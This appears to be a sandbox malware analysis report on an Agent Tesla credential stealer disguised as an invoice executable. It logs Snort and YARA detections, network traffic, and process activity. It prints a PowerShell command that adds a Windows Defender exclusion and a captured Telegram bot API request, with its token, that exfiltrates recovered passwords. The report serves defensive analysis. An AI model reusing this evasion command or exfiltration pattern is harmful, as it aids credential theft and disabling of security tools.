                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x8c040x1c.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x6c200x6e00979248955b7f436231ce51aa98a51027False0.4863991477272727data5.655166343756366IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xa0000x15880x1600c2397d043b091e2d8db31e07aef7bae6False0.455078125data5.152262743776927IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xa1140xc88Device independent bitmap graphic, 32 x 48 x 32, image size 30720.5819825436408977
                                            RT_GROUP_ICON0xad9c0x14data1.05
                                            RT_VERSION0xadb00x3ecdata0.48804780876494025
                                            RT_VERSION0xb19c0x3ecdataEnglishUnited States0.48804780876494025

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            05/23/24-20:22:01.486017TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49711443192.168.2.10149.154.167.220

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 23, 2024 20:22:00.408252001 CEST49711443192.168.2.10149.154.167.220
                                            May 23, 2024 20:22:00.408340931 CEST44349711149.154.167.220192.168.2.10
                                            May 23, 2024 20:22:00.408423901 CEST49711443192.168.2.10149.154.167.220
                                            May 23, 2024 20:22:00.414985895 CEST49711443192.168.2.10149.154.167.220
                                            May 23, 2024 20:22:00.415024042 CEST44349711149.154.167.220192.168.2.10
                                            May 23, 2024 20:22:01.188023090 CEST44349711149.154.167.220192.168.2.10
                                            May 23, 2024 20:22:01.188112974 CEST49711443192.168.2.10149.154.167.220
                                            May 23, 2024 20:22:01.191978931 CEST49711443192.168.2.10149.154.167.220
                                            May 23, 2024 20:22:01.191991091 CEST44349711149.154.167.220192.168.2.10
                                            May 23, 2024 20:22:01.192308903 CEST44349711149.154.167.220192.168.2.10
                                            May 23, 2024 20:22:01.283004999 CEST49711443192.168.2.10149.154.167.220
                                            May 23, 2024 20:22:01.326492071 CEST44349711149.154.167.220192.168.2.10
                                            May 23, 2024 20:22:01.485577106 CEST44349711149.154.167.220192.168.2.10
                                            May 23, 2024 20:22:01.485946894 CEST49711443192.168.2.10149.154.167.220
                                            May 23, 2024 20:22:01.485974073 CEST44349711149.154.167.220192.168.2.10
                                            May 23, 2024 20:22:01.701520920 CEST44349711149.154.167.220192.168.2.10
                                            May 23, 2024 20:22:01.706832886 CEST44349711149.154.167.220192.168.2.10
                                            May 23, 2024 20:22:01.707062006 CEST49711443192.168.2.10149.154.167.220
                                            May 23, 2024 20:22:01.710143089 CEST49711443192.168.2.10149.154.167.220

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 23, 2024 20:22:00.384430885 CEST5218253192.168.2.101.1.1.1
                                            May 23, 2024 20:22:00.401535988 CEST53521821.1.1.1192.168.2.10

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            May 23, 2024 20:22:00.384430885 CEST192.168.2.101.1.1.10x7466Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            May 23, 2024 20:22:00.401535988 CEST1.1.1.1192.168.2.100x7466No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • api.telegram.org

                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.1049711149.154.167.2204437204C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            TimestampBytes transferredDirectionData
                                            2024-05-23 18:22:01 UTC260OUTPOST /bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocument HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=---------------------------8dc7b33b51b57f3
                                            Host: api.telegram.org
                                            Content-Length: 912
                                            Expect: 100-continue
                                            Connection: Keep-Alive
                                            2024-05-23 18:22:01 UTC25INHTTP/1.1 100 Continue
                                            2024-05-23 18:22:01 UTC912OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 33 33 62 35 31 62 35 37 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 33 39 32 34 35 31 36 34 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 33 33 62 35 31 62 35 37 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 33 2f 32 30 32 34 20 31 34 3a 32 31 3a 35 39 0a 55 73 65 72
                                            Data Ascii: -----------------------------8dc7b33b51b57f3Content-Disposition: form-data; name="chat_id"6392451645-----------------------------8dc7b33b51b57f3Content-Disposition: form-data; name="caption"New PW Recovered!Time: 05/23/2024 14:21:59User
                                            2024-05-23 18:22:01 UTC402INHTTP/1.1 400 Bad Request
                                            Server: nginx/1.18.0
                                            Date: Thu, 23 May 2024 18:22:01 GMT
                                            Content-Type: application/json
                                            Content-Length: 56
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            {"ok":false,"error_code":400,"description":"Logged out"}


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:14:21:52
                                            Start date:23/05/2024
                                            Path:C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe"
                                            Imagebase:0x19863840000
                                            File size:622'089 bytes
                                            MD5 hash:7831435DBF79DF5631126A63A722CF35
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:14:21:56
                                            Start date:23/05/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force
                                            Imagebase:0x7ff7b2bb0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:14:21:56
                                            Start date:23/05/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff620390000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:14:21:56
                                            Start date:23/05/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                            Imagebase:0x820000
                                            File size:43'008 bytes
                                            MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2464175604.0000000002C3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2464175604.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            General

                                            Target ID:5
                                            Start time:14:21:56
                                            Start date:23/05/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                            Imagebase:0x950000
                                            File size:43'008 bytes
                                            MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:14:21:57
                                            Start date:23/05/2024
                                            Path:C:\Windows\System32\WerFault.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 3648 -s 1124
                                            Imagebase:0x7ff690230000
                                            File size:570'736 bytes
                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Executed Functions

                                              Function 00007FF7C194060B Relevance: 4.2, Strings: 2, Instructions: 1737COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335798000.00007FF7C1940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1940000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: A$P>_e
                                              • API String ID: 0-2760172250
                                              • Opcode ID: 26d6c94ae439661117c02621799db00d5d905cf450ca48d02b8eb66aba759fb3
                                              • Instruction ID: d2cd09a51e576971eaf9d4954e574ec425437d8d2c77cc0b0b1722551a3f639f
                                              • Opcode Fuzzy Hash: 26d6c94ae439661117c02621799db00d5d905cf450ca48d02b8eb66aba759fb3
                                              • Instruction Fuzzy Hash: 69C2367180DBC54FE756EB2888556A4BFE0FF57314F5905FAC089CB0D3DA68A806C7A2
                                              Function 00007FF7C18631A8 Relevance: 1.9, Strings: 1, Instructions: 687COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: EQ_H
                                              • API String ID: 0-2782182317
                                              • Opcode ID: 7c3732fbd18c48a16febace90f4feed5cd5119295fcfc524ae2291eb85232529
                                              • Instruction ID: c0c38ee2d9cfebaac7aa7e4fdf41bf1c34aeb021e609824eed7c4dc1018906c2
                                              • Opcode Fuzzy Hash: 7c3732fbd18c48a16febace90f4feed5cd5119295fcfc524ae2291eb85232529
                                              • Instruction Fuzzy Hash: 0822183060CB858FD746EF288861665BBE1EF96320B5941FED049C72D3DE28E856C792
                                              Function 00007FF7C1833338 Relevance: 1.9, Strings: 1, Instructions: 669COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: x6nu
                                              • API String ID: 0-1949830615
                                              • Opcode ID: 694df359242b7de94751f17425f033c954af6c7182f486f23f09f7f2bff00669
                                              • Instruction ID: 031ca7460ad8e41654832670121a8314ed6f00ddf6d08e0eb8e3302e7bf5add8
                                              • Opcode Fuzzy Hash: 694df359242b7de94751f17425f033c954af6c7182f486f23f09f7f2bff00669
                                              • Instruction Fuzzy Hash: 6B12B33061CE068FE758AB2894656B9B3D2FF89321F94427DD04EC36C3DE68F8568791
                                              Function 00007FF7C18313D9 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [nu
                                              • API String ID: 0-982414057
                                              • Opcode ID: acb836fd3784a69633235d19d0cbe0e8d751802be11541a23ffea77aa8fadadf
                                              • Instruction ID: 47d5afb852666549de64a223f97c04e7501b40f940447d8e01aafd847dcea076
                                              • Opcode Fuzzy Hash: acb836fd3784a69633235d19d0cbe0e8d751802be11541a23ffea77aa8fadadf
                                              • Instruction Fuzzy Hash: 0851D2B070DA428FD34CAF3894596B9F7D1FF59321B0441BEC04AC76A3DF69A9028784
                                              Function 00007FF7C18316B5 Relevance: .8, Instructions: 814COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3a92fed2233ae09809ee2649d15843ff13a91c9b79931054faa64cabf3ee91be
                                              • Instruction ID: 5ce4dbfca3aa5d4c56bab7e7f5bfe0c5f93194ff8dbe6608d8529770158e9e8b
                                              • Opcode Fuzzy Hash: 3a92fed2233ae09809ee2649d15843ff13a91c9b79931054faa64cabf3ee91be
                                              • Instruction Fuzzy Hash: 4632E871B0CE458FD748AB3C98652B9B7E1FF89325B4442BED04EC3693DE24B8568781
                                              Function 00007FF7C1853100 Relevance: .6, Instructions: 633COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6130cc14267abfe20fa50b00bc810225f2472e4d763f0914db6ef9993a5215eb
                                              • Instruction ID: 02fd66bbcde00c115687849933e440b921c012586731825795fecde0fabeb4cf
                                              • Opcode Fuzzy Hash: 6130cc14267abfe20fa50b00bc810225f2472e4d763f0914db6ef9993a5215eb
                                              • Instruction Fuzzy Hash: B122A47061CB468FD7A8EF188495766B7E1FF99321F50467EC48EC3292DE34E8428782
                                              Function 00007FF7C185B0D0 Relevance: .6, Instructions: 558COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e8deaba0880436c0a9bc9eaca81211c9944f141135426d619a505e4de5e0088
                                              • Instruction ID: 94d40ffcce5ae033834d0972a7b7f23d13c0b53c171c198a0ebd0eae3fe2b611
                                              • Opcode Fuzzy Hash: 0e8deaba0880436c0a9bc9eaca81211c9944f141135426d619a505e4de5e0088
                                              • Instruction Fuzzy Hash: 46123930A18A098BEB98EF18C4A5BB9B3E1FF58324F50417AD44ED3291DF74B895CB50
                                              Function 00007FF7C1830A04 Relevance: .5, Instructions: 530COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5bf9c769189bf08b8be75956b9a5cf3292b1ebb35b0d7d60de39be72bdb8b49c
                                              • Instruction ID: ec7d5be33738e5a1882aae6d07782a5ce42f280b06d105f67ba0f8329906a3b1
                                              • Opcode Fuzzy Hash: 5bf9c769189bf08b8be75956b9a5cf3292b1ebb35b0d7d60de39be72bdb8b49c
                                              • Instruction Fuzzy Hash: FEF16321B1DE494FE798FB2C98563B9A6C2EF88B60F984179D00DC33C7DD68AC518791
                                              Function 00007FF7C1832840 Relevance: 4.2, Strings: 3, Instructions: 431COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #Q_H$6W_H$X8nu
                                              • API String ID: 0-801103790
                                              • Opcode ID: ec4fbcfd3d7a594892c7a9d386527b8d7240d15d973334042090a7d4b305a62b
                                              • Instruction ID: afbb3a7481428efd7820e825cc8e19f259d44732c3016ed588def53be1fcecc0
                                              • Opcode Fuzzy Hash: ec4fbcfd3d7a594892c7a9d386527b8d7240d15d973334042090a7d4b305a62b
                                              • Instruction Fuzzy Hash: 48C1F530A1C9064FE7A9EF2CD858BB4B3D1FF58720B8542B9D44DC71A6DE68EC918760
                                              Function 00007FF7C183169F Relevance: 3.3, Strings: 2, Instructions: 766COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 7nu$ 7nu
                                              • API String ID: 0-97546710
                                              • Opcode ID: 50853c5738567d0796c29102770b64083dc2d398f22154c596de0c1ac5cb60b4
                                              • Instruction ID: 5266f7cfa920e6c0f53cbf6f06b814a598e86aa18c6dc635fb6a91b777567868
                                              • Opcode Fuzzy Hash: 50853c5738567d0796c29102770b64083dc2d398f22154c596de0c1ac5cb60b4
                                              • Instruction Fuzzy Hash: F132043060DA4A8FD75AEB2C9464764B7E1FF89325B5841BEC04ACB693CE24EC56C790
                                              Function 00007FF7C1832865 Relevance: 2.8, Strings: 2, Instructions: 283COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H$x6nu
                                              • API String ID: 0-871658157
                                              • Opcode ID: 8827126061f4c4ef8f72aef1ecd64baed8c9d689d459dca497f7cadaa4fc4095
                                              • Instruction ID: f949cdf65ee1cd3ad059bbff71c8e20fd6199be0851bc1a4cff9ad087d3f214e
                                              • Opcode Fuzzy Hash: 8827126061f4c4ef8f72aef1ecd64baed8c9d689d459dca497f7cadaa4fc4095
                                              • Instruction Fuzzy Hash: 3771E53070C9094FEB98FE6C9454AB673D1FF6837079401BAE40EC72A6DE64EC528790
                                              Function 00007FF7C18304F8 Relevance: 2.7, Strings: 2, Instructions: 203COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [nu$ [nu
                                              • API String ID: 0-3277452902
                                              • Opcode ID: ed85fbd4f34efde6736dd947d1724cccfe057bd05f0dbe7127d47786015dee89
                                              • Instruction ID: e7e4100acf182dc53eeb59dd757f9c2fdc3bde6af9215711892e468095af1c43
                                              • Opcode Fuzzy Hash: ed85fbd4f34efde6736dd947d1724cccfe057bd05f0dbe7127d47786015dee89
                                              • Instruction Fuzzy Hash: 9F51D5B070DA458FD34CAF38846A679BBE0FF5A32174541BEC04AC76A3DE69A8028740
                                              Function 00007FF7C1832848 Relevance: 2.6, Strings: 2, Instructions: 122COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: wL_H$x6nu
                                              • API String ID: 0-1532110656
                                              • Opcode ID: 6a4d54b2ec4e328ffec76ebfbc7a9da953793c83532b258e1f66b48c4570e669
                                              • Instruction ID: 36f83ffbb03e5548f8674ddcb3ebc2c11ea96a19db2be7fe8e5b3bf49dd8243a
                                              • Opcode Fuzzy Hash: 6a4d54b2ec4e328ffec76ebfbc7a9da953793c83532b258e1f66b48c4570e669
                                              • Instruction Fuzzy Hash: B831D62170DE0A4FE798FE6D54996B5B3C5EF5D371B40007AD50DC3292DE55EC528390
                                              Function 00007FF7C183B81F Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: M_^$M_^'
                                              • API String ID: 0-2404277652
                                              • Opcode ID: d19f1736e7940f0318aeb44e137a651478470d31e6f044ec13d2ad1039571298
                                              • Instruction ID: 813dd6db6e867623675822fb9efd86f1fc71bd27166046076e57a41b82bb3350
                                              • Opcode Fuzzy Hash: d19f1736e7940f0318aeb44e137a651478470d31e6f044ec13d2ad1039571298
                                              • Instruction Fuzzy Hash: 2E31097690A6594BD701FB78FC913E8F790EF42375F48037AD08C8B193ED6874958694
                                              Function 00007FF7C185B138 Relevance: 2.0, Strings: 1, Instructions: 731COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "cx
                                              • API String ID: 0-3384518517
                                              • Opcode ID: 980892884a83f250575c77307129502bce038ae5c77c5e712695277f5f645ac0
                                              • Instruction ID: d2604fd9def260769212c1ee65c56ba63b89c237758b06b2cf2a44c9dea5a88c
                                              • Opcode Fuzzy Hash: 980892884a83f250575c77307129502bce038ae5c77c5e712695277f5f645ac0
                                              • Instruction Fuzzy Hash: 1532D23160CA4A4FE754FF28E4907E5B7E1EF85375F54427AC049CA182DE69B886CBA0
                                              Function 00007FF7C185B0E0 Relevance: 1.9, Strings: 1, Instructions: 654COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ,K_L
                                              • API String ID: 0-4112966043
                                              • Opcode ID: dad3cc39c2588d4f392981ccb826ca8104a6557570cd7e0fe3b587e3bc3b846c
                                              • Instruction ID: 5219826217642d22ee71f1f189fc7e637fe7976d85e6a6279e9ae20635345c0d
                                              • Opcode Fuzzy Hash: dad3cc39c2588d4f392981ccb826ca8104a6557570cd7e0fe3b587e3bc3b846c
                                              • Instruction Fuzzy Hash: 2212603060CA098FDB88EB18D495A65F3E2FF99324B5442A9D04EC7696CE75FC52CB81
                                              Function 00007FF7C183283D Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: x6nu
